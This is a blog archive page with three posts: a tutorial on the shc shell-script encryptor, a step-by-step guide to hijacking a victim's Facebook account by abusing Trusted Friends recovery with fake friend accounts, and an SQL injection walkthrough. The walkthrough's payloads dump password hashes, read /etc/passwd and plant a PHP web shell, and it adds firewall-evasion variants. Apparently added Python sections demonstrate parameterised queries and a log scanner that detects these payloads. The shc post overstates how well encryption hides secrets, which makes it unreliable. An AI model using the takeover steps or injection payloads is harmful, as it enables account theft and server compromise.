Nov 2, 2011

Creating executable of Shell Script

It often happens that the shell scripts we write contain sensitive information such as passwords, keys of some sort, or paths to sensitive files, and when such a script is run it is very easy for a normal user to look inside the script and pull the sensitive information out of the code.
There is a program called "shc" that can provide the protection developers want in such cases.

shc itself is not a compiler such as cc, it rather encodes and encrypts a shell script and generates C source code with the added expiration capability. It then uses the system compiler to compile a stripped binary which behaves exactly like the original script. Upon execution, the compiled binary will decrypt and execute the code with the shell -c option. Unfortunately, it will not give you any speed improvement as a real C program would.


shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.


Download shc (here), untar it, then build and install it:

tar -xzvf shc-X.X.tgz
cd shc-X.X/
make
make install

This will install the shc binary on your box.

Create a file called script.sh and add the following contents for testing purposes:

############################### script.sh ##############################

#!/bin/sh

echo "This is a test shell script by Nikesh"

############################### script.sh ##############################


Now run the command:

shc -f script.sh


The switch "-f" specifies the source script to encrypt. The above command creates two files: script.sh.x.c (the generated C source) and script.sh.x (the compiled, encrypted script). Run that binary and see the output:

./script.sh.x

This is a test shell script by Nikesh

Now you can distribute script.sh.x without any fear.

You can also specify a time limit on the shell script so that it will no longer execute after a certain date (expire), and you can specify a custom message to echo back to the user.

shc -e 09/12/2008 -m "Licence expire, please contact author - Nikesh" -f script.sh

./script.sh.x

./script.sh.x has expired!

Licence expire, please contact author - Nikesh


Check out the man pages for more info on "shc".

Source: http://linuxpoison.blogspot.com/2008/12/creating-executable-of-shell-script.html#.TrB6FyLU-4c.twitter


Exploiting “Facebook Trusted Friend” Security Feature

In Facebook's case, the keys are codes, and the user can choose three to five "Trusted Friends" who are each given a code. If you ever get locked out of your account (and you can't access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to regain access. Hackers use this method to break into many Facebook accounts with a little social engineering. How do you hack using this feature?

For this technique you need to create three fake Facebook accounts, and you must get them added as friends on the account of the victim you are going to hack.
Once your fake accounts have been accepted as friends on the victim's account, follow the steps below:

1. Go to Facebook and click "Forgot your Password?".

2. Then you will get a form like the one below; enter the details you know about the victim: username, email address and full name.

3. After entering everything, check it again and click Submit.

4. After a successful search for the user, Facebook shows some information about how many email addresses are linked to the account and offers a simple option saying "No Longer Access to These"; click that one.

5. Now it will prompt you to enter a new email address on which you will receive the password-reset option, so enter your email address. I suggest creating a fake or temporary email address for safety.

6. Then it will prompt you for the security question. If you have a good guess at the answer, that's fine, but if you don't know it, simply enter three wrong answers and it will take you to the three-trusted-friends recovery page, shown below.

7. Now just click Continue and Facebook will ask you to choose three trusted friends; choose the three fake profiles you created and added to the victim's account.

8. After you select the three accounts, Facebook sends security codes to them. Enter these codes and you will receive the password-reset email from Facebook at the address you created in step 5. That's it; you have now succeeded in hacking a Facebook password with the 3 Trusted Friends method.

Source: http://blog.kaffenews.com/?p=2299



Oct 30, 2011

Howto: Basic Step Of SQL Injections

In each step I show two parts: the first is the request made by the attacker, the second is the query string that target.com uses to fetch the data from its database, with the attacker's text embedded in it.

1. Find a vulnerable parameter by sending a special character such as ' or "

Request

target.com/users.php?userid='

Query String
select name, nickname from users where user_id='''

If you receive an error message from the website, the parameter may be vulnerable to attack.

2. Try another test with '1' or '1'='1', then with '1' and '1'='1' and '1' and '1'='2'


Request
target.com/users.php?userid=1' or '1'='1


Query String
select name,nickname from users where user_id='1' or '1'='1'

If you receive more than one result, the user_id parameter is vulnerable.




Request
target.com/users.php?userid=1' and '1'='1

Query String
select name,nickname from users where user_id='1' and '1'='1'

Request
target.com/users.php?userid=1' and '1'='2

Query String
select name,nickname from users where user_id='1' and '1'='2'

When '1' and '1'='1' returns the normal result but '1' and '1'='2' returns nothing, the user_id parameter is vulnerable.


3. In this step we find how many columns the original query returns, using ORDER BY

Request
target.com/users.php?userid=1' ORDER BY 1;#

Query String
select name,nickname from users where user_id='1' ORDER BY 1;#'



If you get no error, try 2, 3, 4, 5, ... in turn; if 8 gives an error message, the original query returns 7 columns.

Now that we know the query returns 7 columns, we must select 7 columns in each of the following steps.

You can also do this step with '1' UNION SELECT 1;#'.


Request
target.com/users.php?userid=1' UNION SELECT 1;#

Query String
select name,nickname from users where user_id='1' UNION SELECT 1;#'

With '1' UNION SELECT 1;#' you get results only if the original query returns exactly one column; otherwise you get nothing.


4. You can try to find column names with '1' OR testing IS NULL;#'


Request
target.com/users.php?userid=1' OR testing IS NULL;#

Query String
select name,nickname from users where user_id='1' OR testing IS NULL;#'

If you get an error or nothing, there is no column named 'testing'. So you can brute-force column names with this statement.


5. After step 4 I know one of the column names is 'name', and I will look up name values with LIKE. With LIKE you can guess at, or extract, the contents of name.

Request
target.com/users.php?userid=1' OR name LIKE '%D%';#

Query String
select name,nickname from users where user_id='1' OR name LIKE '%D%';#'

In LIKE, % is the wildcard for any string and _ matches any single character. This request asks for every name containing a D, so with luck you get the records whose name contains D, such as Dan, Jodan, Jedt, etc.

You can try other queries like these:
1' OR name LIKE '_';#
1' OR name LIKE '____';#
1' OR name LIKE 'D%';#

6. In this step we find table names with 1' AND 1=(SELECT COUNT(*) FROM tablenames);#

Request
target.com/users.php?userid=1' AND 1=(SELECT COUNT(*) FROM tablenames);#

Query String
select name,nickname from users where user_id='1' AND 1=(SELECT COUNT(*) FROM tablenames);#'

The subquery fails with an error when no table named tablenames exists, so you can brute-force table names in the database with this.

7. In this step we find table names again, this time from information_schema, which holds metadata about the databases, tables, users, etc.

information_schema.tables lists the tables of every database:
table_schema holds the database name
table_name holds the table name


Request
target.com/users.php?userid=1' UNION SELECT 1,1,1,1,1,table_schema, table_name FROM information_schema.tables;#

Query String
select name,nickname from users where user_id='1' UNION SELECT 1,1,1,1,1,table_schema, table_name FROM information_schema.tables;#'

This query outputs every database name and table name onto the page.

8. To find the version of the SQL server, use @@version.


Request
target.com/users.php?userid=1' UNION SELECT 1,1,1,1,1,1,@@version;#

Query String
select name, nickname from users where user_id='1' UNION SELECT 1,1,1,1,1,1,@@version;#'


9. To find the database user and the user of the current connection, use system_user() and user().


Request
target.com/users.php?userid=1' UNION SELECT 1,1,1,1,1,system_user(),user();#

Query String
select name, nickname from users where user_id='1' UNION SELECT 1,1,1,1,1,system_user(),user();#'


10. Try to list the password hashes of the database with '1' UNION ALL SELECT 1,1,1,1,1,user,password FROM mysql.user; --priv;#'


Request
target.com/users.php?userid=1' UNION ALL SELECT 1,1,1,1,1,user,password FROM mysql.user; --priv;#

Query String
select name, nickname from users where user_id='1' UNION ALL SELECT 1,1,1,1,1,user,password FROM mysql.user; --priv;#'


11. You can read a file on the server with 1' UNION ALL SELECT load_file('/etc/passwd'),'1


Request
target.com/users.php?userid=1' UNION ALL SELECT load_file('/etc/passwd'),'1


Query String
select name, nickname from users where user_id='1' UNION ALL SELECT load_file('/etc/passwd'),'1'

12. You can create a PHP shell on the server with 1' UNION SELECT '', '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'phpshell.php';#


Request
target.com/users.php?userid=1' UNION SELECT '', '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'phpshell.php';#


Query String
select name, nickname from users where user_id='1' UNION SELECT '', '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'phpshell.php';#'


Once it has been created, you can run commands through it with phpshell.php?cmd=dir.
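The query construction behind steps 1 and 2, beside its parameterised form, as an added example that is not from the original post: it uses Python's sqlite3 with a constructed users table (user_id, name, nickname, as in the page's query string), and the payloads leave off the MySQL-only ;# terminator because SQLite does not treat # as a comment. The function names are my own.

```python
import sqlite3

# Constructed sample data standing in for the users table behind users.php
# (assumption: columns user_id, name, nickname as in the page's query string).
ROWS = [("1", "Dan", "dan"), ("2", "Jodan", "jo"), ("3", "Jedt", "jedt")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, name TEXT, nickname TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db, userid):
    # The page's query string, built by pasting the request parameter into
    # the SQL text: the database parses the attacker's quotes as SQL.
    sql = "select name, nickname from users where user_id='" + userid + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, userid):
    # Same query with a bound parameter: the value travels separately from
    # the SQL text and is never parsed as SQL, so a quote is just a quote.
    sql = "select name, nickname from users where user_id=?"
    return db.execute(sql, (userid,)).fetchall()


def compare(payloads):
    """Run each payload through both lookups; a SQL error in the vulnerable
    path is recorded as a string (the step-1 'error message' signal)."""
    db = make_db()
    out = {}
    for p in payloads:
        try:
            vuln = lookup_vulnerable(db, p)
        except sqlite3.Error as e:
            vuln = "error: " + str(e)
        out[p] = (vuln, lookup_safe(db, p))
    return out


if __name__ == "__main__":
    # Step-1 probe, the step-2 boolean tests and a two-column UNION as on the page.
    for p, (v, s) in compare(["1", "'", "1' or '1'='1", "1' and '1'='2",
                              "1' UNION SELECT sqlite_version(),'x"]).items():
        print(repr(p), "-> vulnerable:", v, "| parameterised:", s)
```

The vulnerable path returns every row for the or-payload and an error for the lone quote, while the parameterised path returns the single matching row for "1" and nothing for any of the payloads.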


Evasion Techniques
This part shows ways to evade some web application firewalls.

Normal attack:
union select from users where day='tomorrow'

Evading:
union select from users where day=REVERSE('worromot')
union select from users where day=0x746f6d6f72726f77
union select from users where day LIKE '0x746f6d6f72726f77'
union select from users where day BETWEEN '0x746f6d6f72726f77' AND '0x746f6d6f72726f77'
union/**/select/**/from/**/users/**/where/**/day='tomorrow'
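A detection pass a defender could run over web-server access logs for the request shapes in steps 1 to 12 and the evasion list above; this is an added example, not from the original post. The log lines are constructed, and the signature names and the normalise/flag/scan helpers are assumptions of mine.

```python
import re
from urllib.parse import unquote_plus

# Signatures taken from the page's requests and its WAF-evasion list; they are
# matched against a normalised request so comment and URL-encoding tricks
# (union/**/select, %27, 0x...) do not hide them.
SIGNATURES = {
    "quote-boolean": r"'\s*(or|and)\s*'?\d*'?\s*=",   # 1' or '1'='1
    "union-select":  r"\bunion\s+(all\s+)?select\b",
    "order-by":      r"\border\s+by\s+\d+",
    "schema-probe":  r"information_schema\.",
    "file-read":     r"load_file\s*\(",
    "file-write":    r"into\s+outfile",
    "fingerprint":   r"@@version|system_user\(\)|\buser\(\)",
    "hex-literal":   r"\b0x[0-9a-f]{8,}\b",
    "reverse":       r"\breverse\s*\(",
    "comment-end":   r";\s*#|--\s",
}
COMPILED = {name: re.compile(p) for name, p in SIGNATURES.items()}


def normalise(raw):
    s = unquote_plus(unquote_plus(raw))  # undo single and double URL-encoding
    s = re.sub(r"/\*.*?\*/", " ", s)      # inline comments used as spaces
    return re.sub(r"\s+", " ", s).lower()


def flag(request_path):
    """Return the names of the signatures that match one request path."""
    s = normalise(request_path)
    return [name for name, rx in COMPILED.items() if rx.search(s)]


# Constructed access-log lines in combined-log layout (not from the page).
LOG = """\
10.0.0.5 - - [30/Oct/2011:10:01:02 +0000] "GET /users.php?userid=1 HTTP/1.1" 200 512
10.0.0.9 - - [30/Oct/2011:10:01:07 +0000] "GET /users.php?userid=1%27%20or%20%271%27=%271 HTTP/1.1" 200 9031
10.0.0.9 - - [30/Oct/2011:10:01:20 +0000] "GET /users.php?userid=1%27%20UNION%20SELECT%201,1,1,1,1,table_schema,table_name%20FROM%20information_schema.tables;%23 HTTP/1.1" 200 45120
10.0.0.9 - - [30/Oct/2011:10:02:01 +0000] "GET /users.php?userid=1%27/**/union/**/select/**/load_file(%27/etc/passwd%27),%271 HTTP/1.1" 200 2200
10.0.0.9 - - [30/Oct/2011:10:02:30 +0000] "GET /users.php?userid=0x746f6d6f72726f77 HTTP/1.1" 200 512
10.0.0.7 - - [30/Oct/2011:10:03:00 +0000] "GET /users.php?userid=42 HTTP/1.1" 200 480
"""
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')


def scan(log_text):
    """Return (client ip, path, matched signatures) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        why = flag(m.group(2)) if m else []
        if why:
            hits.append((m.group(1), m.group(2), why))
    return hits
```

Running scan(LOG) flags the four requests from 10.0.0.9 and leaves the two plain numeric lookups alone.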
